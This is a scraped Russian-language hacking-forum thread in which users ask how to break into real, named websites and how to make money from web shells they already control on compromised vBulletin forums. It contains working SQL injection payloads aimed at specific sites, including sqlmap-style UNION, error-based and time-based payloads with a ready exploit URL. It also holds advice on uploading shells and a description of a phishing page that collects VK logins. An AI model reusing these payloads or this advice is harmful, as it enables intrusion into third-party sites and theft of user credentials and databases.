Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить. А по сабжу кури Это Помойму там в лимит инекция и ниче ты там не раскрутишь.
Очень смешно.Я там уже курил и не смог ничего сделать! Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.
Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.
Биржы ссылок, гонять трафик, просто продавать шеллы и т.д. А вообще на ачате была статья про монетизацию шеллов, достаточно было бы воспользоваться поиском: http://forum.antichat.ru/thread220472.html
Приветствую. Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции. Пример обращения к php-скрипту: http://site.ru/[email protected]&parol=1111111 Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...
Во-первых, по ващим словам, это SQL инъекция, а не PHP. Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.
UPD allow_url_fopen on post_max_size 8M max_file_uploads 20 upload_max_filesize 10M функцией пыха copy тоже не удается создается файл с размером нормальным ,но открываю ,а там пусто. Раньше подобные сервани тоже попадились ,но там все решалось просто бэкдор=>wget .... ,а на винде такая трабла 1 раз.
Запись идет в TXT-файл. Пример вот: logins-vk.3dn.ru/video465423567-4583112.html По клику на кнопку войти все данные из заполненной формы передаются сюда: upmozgoff.ru/log.php Сами параметры: email и pass
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз
Издеваетесь? Проще простого...Совсем народ оборзел. Code: http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product
Есть скуля с правами ROOT Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники. Что можно сделать чтобы порутать данный серв?
Не пойму как правильно тут составить запрос... Хелп плс... http://skyscript.ru/primer/skynews/?act=nov&news_id=1
Place: GET Parameter: news_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3 a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR( RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia zZ Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x 51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL%2CNULL%2CNULL%23 пробелы ток убери
